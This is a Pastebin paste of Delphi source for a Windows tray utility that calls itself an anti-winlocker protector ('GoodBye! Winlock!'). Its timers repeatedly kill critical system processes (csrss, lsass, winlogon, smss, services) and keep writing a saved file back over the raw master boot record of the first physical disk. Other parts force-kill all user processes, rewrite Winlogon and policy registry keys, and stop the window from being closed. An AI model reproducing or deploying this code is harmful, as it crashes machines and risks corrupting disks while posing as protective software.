API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 17th, 2018
74
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.14 KB | None | 0 0
raw download clone embed print report
  1. unit Unit1;
  2.  
  3. interface
  4.  
  5. uses
  6. Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  7. Dialogs, ExtCtrls, ShellAPI, TlHelp32, Menus, ExtCtrlsX,
  8. XPMan, StdCtrls, Registry;
  9.  
  10. type
  11. TForm1 = class(TForm)
  12. tmr1: TTimer;
  13. tmr2: TTimer;
  14. trycn1: TTrayIcon;
  15. pm1: TPopupMenu;
  16. D1: TMenuItem;
  17. D2: TMenuItem;
  18. d3: TMenuItem;
  19. D4: TMenuItem;
  20. xpmnfst1: TXPManifest;
  21. btn1: TButton;
  22. btn2: TButton;
  23. tmr3: TTimer;
  24. tmr4: TTimer;
  25. tmr5: TTimer;
  26. N1: TMenuItem;
  27. N2: TMenuItem;
  28. procedure tmr1Timer(Sender: TObject);
  29. procedure D4Click(Sender: TObject);
  30. procedure tmr2Timer(Sender: TObject);
  31. procedure btn1Click(Sender: TObject);
  32. procedure FormCreate(Sender: TObject);
  33. procedure tmr3Timer(Sender: TObject);
  34. procedure btn2Click(Sender: TObject);
  35. procedure tmr4Timer(Sender: TObject);
  36. procedure tmr5Timer(Sender: TObject);
  37. procedure d3Click(Sender: TObject);
  38. procedure D2Click(Sender: TObject);
  39. procedure D1Click(Sender: TObject);
  40. procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean);
  41. private
  42. { Private declarations }
  43. public
  44. { Public declarations }
  45. end;
  46.  
  47. var
  48. Form1: TForm1;
  49.  
  50. implementation
  51.  
  52. {$R *.dfm}
  53.  
  54. Function HandleToFullPath(H: HWND): String;
  55. Var
  56. Pid:Cardinal;
  57. M: TModuleEntry32;
  58. HSnapshot: THandle;
  59. Begin
  60. Result:='';
  61. GetWindowThreadProcessId(H,@Pid);
  62. HSnapshot:=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,Pid);
  63. If HSnapshot=-1 Then
  64. Exit;
  65. M.DwSize:=SizeOf(TModuleEntry32);
  66. If Module32First(HSnapshot,M) Then
  67. Result:=M.SzExePath;
  68. CloseHandle(HSnapshot);
  69. End;
  70.  
  71. function KillTask (ExeFileName:String):integer;
  72. const Process_Terminate=$0001;
  73. var ContinueLoop:BOOL;
  74. FSnapShotHandle:THandle;
  75. FProcessEntry32:TProcessEntry32;
  76. begin
  77. result:=0;
  78. FSnapShotHandle:=CreateToolHelp32SnapShot(TH32CS_SnapProcess,0);
  79. FProcessEntry32.dwSize:=SizeOf(FProcessEntry32);
  80. continueLoop:=Process32First(FSnapShotHandle,FProcessEntry32);
  81. while integer(continueloop)<>0 do
  82. begin
  83. if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile))= UpperCase(ExeFileName))
  84. or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then
  85. Result:=Integer(TerminateProcess(OpenProcess(Process_TERMINATE,bool(0),
  86. FProcessEntry32.th32ProcessID),0));
  87. ContinueLoop:=Process32Next(FSnapShotHandle,FProcessEntry32);
  88. end;
  89. CloseHandle(FSnapShotHandle);
  90. end;
  91.  
  92. function MyCallback(Wnd: THandle;Param: integer): boolean; stdcall;
  93. var
  94. style: longint;
  95. tsb, rabst: integer;
  96. begin
  97. tsb:=FindWindow('Shell_TrayWnd', nil);
  98. rabst:=FindWindow('ProgMan', 'Program Manager');
  99. Result := Wnd <> 0;
  100. style:=GetWindowLong(wnd,GWL_EXSTYLE);
  101. style:=style and WS_EX_TOPMOST;
  102. if Result and IsWindowVisible(Wnd)and (not IsIconic(WND)) and (wnd<>tsb) and
  103. (wnd<>rabst) and (wnd<>FindWindow('Indicator',nil)) and
  104. (style<>WS_EX_TOPMOST)and(wnd<>form1.handle)then
  105. begin
  106. ShowWindow(Wnd,sw_hide);
  107. ShowWindow(Wnd,Param);
  108. end;
  109. end;
  110.  
  111.  
  112. procedure ShowAllWindows(Cmd: integer);
  113. begin
  114. EnumWindows(@MyCallback,Cmd);
  115. end;
  116.  
  117. function processExists(exeFileName: string): Boolean;
  118. var
  119. ContinueLoop: BOOL;
  120. FSnapshotHandle: THandle;
  121. FProcessEntry32: TProcessEntry32;
  122. begin
  123. FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  124. FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
  125. ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
  126. Result := False;
  127. while Integer(ContinueLoop) <> 0 do
  128. begin
  129. if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
  130. UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
  131. UpperCase(ExeFileName))) then
  132. begin
  133. Result := True;
  134. end;
  135. ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  136. end;
  137. CloseHandle(FSnapshotHandle);
  138. end;
  139.  
  140. procedure MBRSave;
  141. var
  142. f1,f2:cardinal;
  143. buf:array [0..511] of byte;
  144. nr,nw:Cardinal;
  145. begin
  146. f1 := CreateFileA('\\.\PhysicalDrive0',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
  147. f2 := CreateFileA('backup.bin',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,CREATE_ALWAYS,0,0);
  148. ReadFile(f1,buf,512,nr,0);
  149. WriteFile(f2,buf,nr,nw,0);
  150. CloseHandle(f1);
  151. CloseHandle(f2);
  152. end;
  153.  
  154. procedure MBRLoad;
  155. var
  156. f1,f2:cardinal;
  157. buf:array [0..511] of byte;
  158. nr,nw:Cardinal;
  159. begin
  160. f1 := CreateFileA('\\.\PhysicalDrive0',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
  161. f2 := CreateFileA('backup.bin',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
  162. ReadFile(f2,buf,512,nr,0);
  163. WriteFile(f1,buf,nr,nw,0);
  164. CloseHandle(f1);
  165. CloseHandle(f2);
  166. end;
  167.  
  168. procedure TForm1.tmr1Timer(Sender: TObject);
  169. begin
  170. KillTask('smss.exe');
  171. KillTask('csrss.exe');
  172. KillTask('winlogon.exe');
  173. KillTask('services.exe');
  174. KillTask('lsass.exe');
  175. end;
  176.  
  177. procedure TForm1.D4Click(Sender: TObject);
  178. begin
  179. Application.Terminate;
  180. end;
  181.  
  182. procedure TForm1.tmr2Timer(Sender: TObject);
  183. begin
  184. btn1.Click;
  185. end;
  186.  
  187. procedure TForm1.btn1Click(Sender: TObject);
  188. begin
  189. if FileExists('backup.bin') then
  190. MBRLoad
  191. else
  192. MBRSave
  193. end;
  194.  
  195. procedure TForm1.FormCreate(Sender: TObject);
  196. begin
  197. trycn1.ShowBalloonHint;
  198. end;
  199.  
  200. procedure TForm1.tmr3Timer(Sender: TObject);
  201. begin
  202. SystemParametersInfo(SPI_SETFASTTASKSWITCH, 0, 0, 0);
  203. SystemParametersInfo(SPI_SCREENSAVERRUNNING, 0, 0, 0);
  204. end;
  205.  
  206. procedure TForm1.btn2Click(Sender: TObject);
  207. var
  208. WH:HWND;
  209. r:tregistry;
  210. begin
  211.  
  212. WH:=Handle;
  213. repeat
  214. WH:=GetNextWindow(WH,GW_HWNDNEXT);
  215. if (GetParent(WH)=0)and(not IsIconic(WH))and(IsWindowVisible(WH)) then
  216. PostMessage(WH,WM_SYSCOMMAND,SC_close,0);
  217. until WH=0;
  218.  
  219. WH:=Handle;
  220. repeat
  221. WH:=GetNextWindow(WH,GW_HWNDNEXT);
  222. if (GetParent(WH)=0)and(not IsIconic(WH))and(IsWindowVisible(WH)) then
  223. PostMessage(WH,WM_SYSCOMMAND,SC_minimize,0);
  224. until WH=0;
  225. ShowAllWindows(SW_SHOWMINIMIZED);
  226. ShellExecute(0,'open','cmd.exe',PChar('/c TASKKILL /F /FI "Imagename ne '+ExtractFileName(Application.ExeName)+'" /FI "USERNAME eq %USERNAME%'),'C:\Windows\system32\',SW_HIDE);
  227.  
  228. r:=Tregistry.Create;
  229. r.RootKey:=HKEY_CURRENT_USER;
  230. r.OpenKey('software\Microsoft\Windows\CurrentVersion\Policies\system',true);
  231. r.WriteInteger('DisableTaskMgr',0);
  232. r.closekey;
  233. r.free;
  234.  
  235. r:=Tregistry.Create;
  236. r.RootKey:=HKEY_CURRENT_USER;
  237. r.OpenKey('Software\Policies\Microsoft\Windows\System',true);
  238. r.WriteInteger('DisableCMD',0);
  239. r.closekey;
  240. r.free;
  241.  
  242. r:=Tregistry.Create;
  243. r.RootKey:=HKEY_CURRENT_USER;
  244. r.OpenKey('software\Microsoft\Windows\CurrentVersion\Policies\system',true);
  245. r.WriteInteger('DisableRegistryTools',0);
  246. r.closekey;
  247. r.free;
  248.  
  249. r:=Tregistry.Create;
  250. r.RootKey:=HKEY_LOCAL_MACHINE;
  251. r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
  252. r.DeleteValue('NoViewOnDrive');
  253. r.closekey;
  254. r.free;
  255.  
  256. r:=Tregistry.Create;
  257. r.RootKey:=HKEY_CURRENT_USER;
  258. r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
  259. r.WriteInteger('NoClose',0);
  260. r.closekey;
  261. r.free;
  262.  
  263. r:=Tregistry.Create;
  264. r.RootKey:=HKEY_LOCAL_MACHINE;
  265. r.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Run',true);
  266. r.DeleteValue('Asynchronous');
  267. r.DeleteValue('Impersonate');
  268. r.DeleteValue('DllName');
  269. r.DeleteValue('Logon');
  270. r.closekey;
  271. r.free;
  272.  
  273. r:=Tregistry.Create;
  274. r.RootKey:=HKEY_CURRENT_USER;
  275. r.OpenKey('software\Microsoft\Windows\CurrentVersion\run',true);
  276. r.DeleteValue('windows');
  277. r.closekey;
  278. r.free;
  279.  
  280. r:=Tregistry.Create;
  281. r.RootKey:=HKEY_LOCAL_MACHINE;
  282. r.OpenKey('software\Microsoft\Windows\CurrentVersion\run',true);
  283. r.DeleteValue('userini');
  284. r.closekey;
  285. r.free;
  286.  
  287. r:=Tregistry.Create;
  288. r.RootKey:=HKEY_LOCAL_MACHINE;
  289. r.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
  290. r.WriteString('Shell','Explorer.exe');
  291. r.closekey;
  292. r.free;
  293. KillTask('explorer.exe');
  294. WinExec('explorer.exe', SW_NORMAL);
  295. end;
  296.  
  297. procedure TForm1.tmr4Timer(Sender: TObject);
  298. label
  299. kon,jigurda;
  300. begin
  301. if processExists('explorer.exe') then begin
  302. goto kon
  303. end
  304. else
  305. begin
  306. goto jigurda;
  307. jigurda:
  308. btn2.Click;
  309. kon:
  310. end;
  311. end;
  312.  
  313. procedure TForm1.tmr5Timer(Sender: TObject);
  314. label
  315. kon,jigurda;
  316. begin
  317. if not processExists('sound.exe') then begin
  318. goto kon
  319. end
  320. else
  321. begin
  322. goto jigurda;
  323. jigurda:
  324. btn2.Click;
  325. kon:
  326. end;
  327. end;
  328.  
  329. procedure TForm1.d3Click(Sender: TObject);
  330. begin
  331. tmr1.Enabled:= False;
  332. tmr2.Enabled:= False;
  333. tmr3.Enabled:= False;
  334. tmr4.Enabled:= False;
  335. tmr5.Enabled:= False;
  336. trycn1.BalloonHint:='Защита выключена !';
  337. trycn1.ShowBalloonHint;
  338. end;
  339.  
  340. procedure TForm1.D2Click(Sender: TObject);
  341. begin
  342. tmr1.Enabled:= True;
  343. tmr2.Enabled:= True;
  344. tmr3.Enabled:= True;
  345. tmr4.Enabled:= True;
  346. tmr5.Enabled:= True;
  347. trycn1.BalloonHint:='Защита включена !';
  348. trycn1.ShowBalloonHint;
  349. end;
  350.  
  351. procedure TForm1.D1Click(Sender: TObject);
  352. begin
  353. trycn1.BalloonHint:='GoodBye! Winlock! v1.0 - данная программа позволяет защититься от программ которые блокируют работу системы';
  354. trycn1.ShowBalloonHint;
  355. end;
  356.  
  357. procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
  358. begin
  359. CanClose:= False;
  360. end;
  361.  
  362. end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!